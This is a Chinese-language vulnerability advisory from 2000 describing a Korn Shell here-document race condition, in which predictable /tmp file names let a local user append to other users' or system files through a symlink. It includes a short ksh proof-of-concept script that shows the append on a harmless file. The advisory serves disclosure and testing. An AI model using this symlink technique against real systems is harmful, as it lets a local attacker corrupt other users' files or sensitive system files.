首页 -> 安全研究

安全研究

安全漏洞
Korn Shell 输入重定向竞争条件漏洞

发布日期:2000-12-25
更新日期:2000-12-25

受影响系统:

   Digital (Compaq) TRU64/DIGITAL UNIX 5.0
   HP HP-UX 9.0
   SGI IRIX 6.5.7
   SGI IRIX 6.5.5
   SGI IRIX 6.2
   Sun Solaris 7.0
   Sun Solaris 2.6
   Sun Solaris 2.5.1
不受影响系统:

   HP HP-UX 11.0
   Sun Solaris 8.0
描述:

Korn Shell 是广泛使用的多功能的 shell,随 UNIX 操作
系统家族中的大多数成员一起发行。它存在一个问题,这个
问题使得本地用户可以向其它用户的文件里附加内容。

问题发生在输入输出重定向操作符 << 上。使用 << 操作符
时,脚本和命令行命令可以在 /tmp 目录里不安全地创建文
件,特别是以 tmp.<pid> 为文件名创建文件。这里的 pid
是进程号。可以在 /tmp 目录里用前面所说的文件名创建一
个符号连接文件,然后用 << 操作就可以向符号连接指向的
文件里附加内容了。这个设计漏洞使得恶意用户可以破坏其
它用户的文件,或者向敏感系统文件里附加内容。


<*来源:Paul Szabo (psz@maths.usyd.edu.au) *>



测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


  #!/bin/ksh -x
  touch /tmp/silly.1
  ln -s /tmp/silly.1 /tmp/sh$$.1
  ls -l /tmp/silly.* /tmp/sh$$.*
  cat <<EOF
  Just some short text
  EOF
  ls -l /tmp/silly.* /tmp/sh$$.*
  rm /tmp/silly.* /tmp/sh$$.*

建议:

厂商补丁:

暂无

浏览次数:4800
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障